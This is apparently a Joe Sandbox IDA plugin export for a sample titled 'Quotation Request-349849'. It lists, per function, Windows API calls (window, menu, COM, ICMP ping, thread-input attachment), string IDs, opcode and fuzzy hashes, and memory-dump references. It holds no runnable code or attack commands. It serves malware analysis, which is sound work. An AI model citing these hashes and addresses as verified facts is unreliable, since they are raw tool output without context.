                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                      • String ID: 0$F
                                                      • API String ID: 176399719-3044882817
                                                      • Opcode ID: 1353c8c2042c4d7dc9e2d12887e4bc3150b8a2f0f70c6417c99c7a5284f3b1ff
                                                      • Instruction ID: f0d0cb5b003281c445ac502e5065c9a3145c86bd569ce65a012e8b3061472a88
                                                      • Opcode Fuzzy Hash: 1353c8c2042c4d7dc9e2d12887e4bc3150b8a2f0f70c6417c99c7a5284f3b1ff
                                                      • Instruction Fuzzy Hash: 6C413674A01309EFDB20DFA4E984E9A7BB5FF48352F148029FE06A7361D731A914CB90
                                                      APIs
                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0085755E
                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00857565
                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00857578
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00857580
                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0085758B
                                                      • DeleteDC.GDI32(00000000), ref: 00857594
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0085759E
                                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 008575B2
                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 008575BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                      • String ID: static
                                                      • API String ID: 2559357485-2160076837
                                                      • Opcode ID: e06e1a7395bdb9f321265f9c083659d375c4a1402382004938685067a1f3bb58
                                                      • Instruction ID: 215f18eaeecd220845face38784550c58ef2d1c12d403a8f3d88c09d5f67c3c9
                                                      • Opcode Fuzzy Hash: e06e1a7395bdb9f321265f9c083659d375c4a1402382004938685067a1f3bb58
                                                      • Instruction Fuzzy Hash: 9F317832104214BBDF129F64EC08FEB3BA9FF09362F104224FA15E21A1D735D815DBA4
                                                      APIs
                                                      • _memset.LIBCMT ref: 007F6E3E
                                                        • Part of subcall function 007F8B28: __getptd_noexit.LIBCMT ref: 007F8B28
                                                      • __gmtime64_s.LIBCMT ref: 007F6ED7
                                                      • __gmtime64_s.LIBCMT ref: 007F6F0D
                                                      • __gmtime64_s.LIBCMT ref: 007F6F2A
                                                      • __allrem.LIBCMT ref: 007F6F80
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007F6F9C
                                                      • __allrem.LIBCMT ref: 007F6FB3
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007F6FD1
                                                      • __allrem.LIBCMT ref: 007F6FE8
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007F7006
                                                      • __invoke_watson.LIBCMT ref: 007F7077
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                      • String ID:
                                                      • API String ID: 384356119-0
                                                      • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                      • Instruction ID: ffaa8ddeb7839884007ba40a874c4c0bbee2b30fa01c6e7e0240534cfaa190f8
                                                      • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                      • Instruction Fuzzy Hash: AC71B476A00B1BABD718AA68DC41B7AB7A8FF04724F144229F614D73C1EB78DA40C791
                                                      APIs
                                                      • _memset.LIBCMT ref: 00832542
                                                      • GetMenuItemInfoW.USER32(00895890,000000FF,00000000,00000030), ref: 008325A3
                                                      • SetMenuItemInfoW.USER32(00895890,00000004,00000000,00000030), ref: 008325D9
                                                      • Sleep.KERNEL32(000001F4), ref: 008325EB
                                                      • GetMenuItemCount.USER32(?), ref: 0083262F
                                                      • GetMenuItemID.USER32(?,00000000), ref: 0083264B
                                                      • GetMenuItemID.USER32(?,-00000001), ref: 00832675
                                                      • GetMenuItemID.USER32(?,?), ref: 008326BA
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00832700
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00832714
                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00832735
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                      • String ID:
                                                      • API String ID: 4176008265-0
                                                      • Opcode ID: 0e1ce4d46db35ee3a3126308af0fa6dde0cb168655d4abf830ce781c1c306ce7
                                                      • Instruction ID: 6669a87de367bbf8032645cf01f8f183bbbe7d84e535a8c2f85cb329ac3229ae
                                                      • Opcode Fuzzy Hash: 0e1ce4d46db35ee3a3126308af0fa6dde0cb168655d4abf830ce781c1c306ce7
                                                      • Instruction Fuzzy Hash: BD618BB0900249AFDF11DFA8DC89DBE7BB9FB81308F144059E942E7251E735AE05DBA1
                                                      APIs
                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00856FA5
                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00856FA8
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00856FCC
                                                      • _memset.LIBCMT ref: 00856FDD
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00856FEF
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00857067
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$LongWindow_memset
                                                      • String ID:
                                                      • API String ID: 830647256-0
                                                      • Opcode ID: e19e47ed134139b1efdd65c5f30b0208f82a6c49ff13145edaa21b399b3504d4
                                                      • Instruction ID: ffa416d92269ed9b10af20328c1a9e828a5738b45327834be8bf831a3daea436
                                                      • Opcode Fuzzy Hash: e19e47ed134139b1efdd65c5f30b0208f82a6c49ff13145edaa21b399b3504d4
                                                      • Instruction Fuzzy Hash: ED615875900208AFDB11DFA8DC81EEE77F8FB08711F14416AFA14EB2A1D771AA45CB90
                                                      APIs
                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00826BBF
                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00826C18
                                                      • VariantInit.OLEAUT32(?), ref: 00826C2A
                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00826C4A
                                                      • VariantCopy.OLEAUT32(?,?), ref: 00826C9D
                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00826CB1
                                                      • VariantClear.OLEAUT32(?), ref: 00826CC6
                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00826CD3
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00826CDC
                                                      • VariantClear.OLEAUT32(?), ref: 00826CEE
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00826CF9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                      • String ID:
                                                      • API String ID: 2706829360-0
                                                      • Opcode ID: e46854489863b6ccbb0c0278d68ee1eeea3b737b8a4756170c86b48454522e6f
                                                      • Instruction ID: ed37ee4f5c9c514204a6a8b3d5ab245f3c14c0f4615f36566ed5bb6dbe3baa2a
                                                      • Opcode Fuzzy Hash: e46854489863b6ccbb0c0278d68ee1eeea3b737b8a4756170c86b48454522e6f
                                                      • Instruction Fuzzy Hash: C2414275A00229DFCF00EF68D848DAEBBB9FF08355F008069EA55E7261DB34A955CB94
                                                      APIs
                                                        • Part of subcall function 007D9837: __itow.LIBCMT ref: 007D9862
                                                        • Part of subcall function 007D9837: __swprintf.LIBCMT ref: 007D98AC
                                                      • CoInitialize.OLE32 ref: 00848403
                                                      • CoUninitialize.OLE32 ref: 0084840E
                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00862BEC,?), ref: 0084846E
                                                      • IIDFromString.OLE32(?,?), ref: 008484E1
                                                      • VariantInit.OLEAUT32(?), ref: 0084857B
                                                      • VariantClear.OLEAUT32(?), ref: 008485DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                      • API String ID: 834269672-1287834457
                                                      • Opcode ID: 021cea301bab1100333aa72cff3de401a57955e36ca9bc01552c03cef95708f2
                                                      • Instruction ID: 29d39db67b53f09ca510f2cb589c76c5e31ebd59c213778ec6d279e2d3ec242a
                                                      • Opcode Fuzzy Hash: 021cea301bab1100333aa72cff3de401a57955e36ca9bc01552c03cef95708f2
                                                      • Instruction Fuzzy Hash: AA61567060831AEFC710DF24C848A6EBBE8FF49754F00445AFA85DB291CB74E948CB96
                                                      APIs
                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00845793
                                                      • inet_addr.WSOCK32(?,?,?), ref: 008457D8
                                                      • gethostbyname.WSOCK32(?), ref: 008457E4
                                                      • IcmpCreateFile.IPHLPAPI ref: 008457F2
                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00845862
                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00845878
                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 008458ED
                                                      • WSACleanup.WSOCK32 ref: 008458F3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                      • String ID: Ping
                                                      • API String ID: 1028309954-2246546115
                                                      • Opcode ID: b6cd6ea5eccd5a50a14da1c141760621c51885665f9eb6306e3f2461be304ca5
                                                      • Instruction ID: 938e0fdbdd0b53a41b3259351285794db1f198ad07f4ac731a13bd181e86f815
                                                      • Opcode Fuzzy Hash: b6cd6ea5eccd5a50a14da1c141760621c51885665f9eb6306e3f2461be304ca5
                                                      • Instruction Fuzzy Hash: 76513871604704DFDB11AF24D849B2EBBE4FB48724F04492AFA56DB2A2DB74E900DB52
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0083B4D0
                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0083B546
                                                      • GetLastError.KERNEL32 ref: 0083B550
                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 0083B5BD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                      • API String ID: 4194297153-14809454
                                                      • Opcode ID: f306679a139d4a3a5c3a74858183b72ddb5691b70ff804483e2e56f6285b7ec9
                                                      • Instruction ID: 28cc53659a519e75564d6c8956cea61f3a0000439a3d1c5c7baa53c100ce8a88
                                                      • Opcode Fuzzy Hash: f306679a139d4a3a5c3a74858183b72ddb5691b70ff804483e2e56f6285b7ec9
                                                      • Instruction Fuzzy Hash: 913192B5A00209EFCB10EF68C849EADBBB4FF84315F504166E616D7391DB749A41CB91
                                                      APIs
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                        • Part of subcall function 0082AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0082AABC
                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00829014
                                                      • GetDlgCtrlID.USER32 ref: 0082901F
                                                      • GetParent.USER32 ref: 0082903B
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0082903E
                                                      • GetDlgCtrlID.USER32(?), ref: 00829047
                                                      • GetParent.USER32(?), ref: 00829063
                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00829066
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 1536045017-1403004172
                                                      • Opcode ID: a65fc0e901578192fad30850dee38a1752c36cc59914c36f0b4ef58e7cd4d2e5
                                                      • Instruction ID: d0e9324285a9655f2e6d19479825ef3075aa7c013c1681eafe23852635143bd4
                                                      • Opcode Fuzzy Hash: a65fc0e901578192fad30850dee38a1752c36cc59914c36f0b4ef58e7cd4d2e5
                                                      • Instruction Fuzzy Hash: 6321F870A00218BBDF04ABA4DC89EFEBBB5FF59310F100116F961972A2EB795855DB20
                                                      APIs
                                                        • Part of subcall function 007D7DE1: _memmove.LIBCMT ref: 007D7E22
                                                        • Part of subcall function 0082AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0082AABC
                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 008290FD
                                                      • GetDlgCtrlID.USER32 ref: 00829108
                                                      • GetParent.USER32 ref: 00829124
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00829127
                                                      • GetDlgCtrlID.USER32(?), ref: 00829130
                                                      • GetParent.USER32(?), ref: 0082914C
                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 0082914F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 1536045017-1403004172
                                                      • Opcode ID: 68ea218545e5c96cc17f9d112b976e55ef9302a8868e0b41b6bbd42caa256363
                                                      • Instruction ID: 9c7ea70b4243e675ec57a9225dc28296d746198ea57034711aca2c39f6d78740
                                                      • Opcode Fuzzy Hash: 68ea218545e5c96cc17f9d112b976e55ef9302a8868e0b41b6bbd42caa256363
                                                      • Instruction Fuzzy Hash: F921F874A00218BBDF04ABA4DC89EFEBBB4FF54300F100016F551D72A2EB795455DB20
                                                      APIs
                                                      • GetParent.USER32 ref: 0082916F
                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00829184
                                                      • _wcscmp.LIBCMT ref: 00829196
                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00829211
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameParentSend_wcscmp
                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                      • API String ID: 1704125052-3381328864
                                                      • Opcode ID: 6e78c074890dac42a9184e4f61b1405b4c0882afff66003f583d6b069b0f8ae5
                                                      • Instruction ID: 94ef18467d6b8773444711c96b9dc97768fe9255e2fe61a43c10ed2f944bee29
                                                      • Opcode Fuzzy Hash: 6e78c074890dac42a9184e4f61b1405b4c0882afff66003f583d6b069b0f8ae5
                                                      • Instruction Fuzzy Hash: 0011947624831BF9EA112664EC0EDA73B9CFB15720F300066FA30E55D2FE6D98A15694
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 008488D7
                                                      • CoInitialize.OLE32(00000000), ref: 00848904
                                                      • CoUninitialize.OLE32 ref: 0084890E
                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00848A0E
                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00848B3B
                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00862C0C), ref: 00848B6F
                                                      • CoGetObject.OLE32(?,00000000,00862C0C,?), ref: 00848B92
                                                      • SetErrorMode.KERNEL32(00000000), ref: 00848BA5
                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00848C25
                                                      • VariantClear.OLEAUT32(?), ref: 00848C35
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                      • String ID:
                                                      • API String ID: 2395222682-0
                                                      • Opcode ID: e1aef05d4d476a109e6385f68618a0d012344a1a8f6400a23e6832e1af3eb98b
                                                      • Instruction ID: 14a07fe9b949a9c3ea43352190afe8ad6000b6bbd41899b629592bab72f47290
                                                      • Opcode Fuzzy Hash: e1aef05d4d476a109e6385f68618a0d012344a1a8f6400a23e6832e1af3eb98b
                                                      • Instruction Fuzzy Hash: 90C1D1B1608309EFD700DF68C88492ABBE9FB89758F00496DF989DB251DB71ED05CB52
                                                      APIs
                                                      • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00837A6C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ArraySafeVartype
                                                      • String ID:
                                                      • API String ID: 1725837607-0
                                                      • Opcode ID: 21c1c77cccaffbe64c2c0bee7b529880568242c948b591b66f5f199c3c662223
                                                      • Instruction ID: 86481eef7af678deb5cfcb97b55693a782e9947b7185fad95b01a366444375f9
                                                      • Opcode Fuzzy Hash: 21c1c77cccaffbe64c2c0bee7b529880568242c948b591b66f5f199c3c662223
                                                      • Instruction Fuzzy Hash: F4B160B190421A9FDB20DFA8C885BBEB7B4FF89325F144429EA01E7251D778E941CBD1
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 008311F0
                                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00830268,?,00000001), ref: 00831204
                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 0083120B
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00830268,?,00000001), ref: 0083121A
                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0083122C
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00830268,?,00000001), ref: 00831245
                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00830268,?,00000001), ref: 00831257
                                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00830268,?,00000001), ref: 0083129C
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00830268,?,00000001), ref: 008312B1
                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00830268,?,00000001), ref: 008312BC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                      • String ID:
                                                      • API String ID: 2156557900-0
                                                      • Opcode ID: 22627d0c58d9c1d89b08d670463b7e541d5089ae6cdf2a20e72e0c36e6922959
                                                      • Instruction ID: b06525bb06c757074c244a1fbcb07131d0125f70ec4b9b8a3f11f530ea5378f0
                                                      • Opcode Fuzzy Hash: 22627d0c58d9c1d89b08d670463b7e541d5089ae6cdf2a20e72e0c36e6922959
                                                      • Instruction Fuzzy Hash: 6C319175601304BBDF10EF54EC48F6A77A9FB94712F148116F902C71A1EBB89D508BA0
                                                      APIs
                                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 007DFAA6
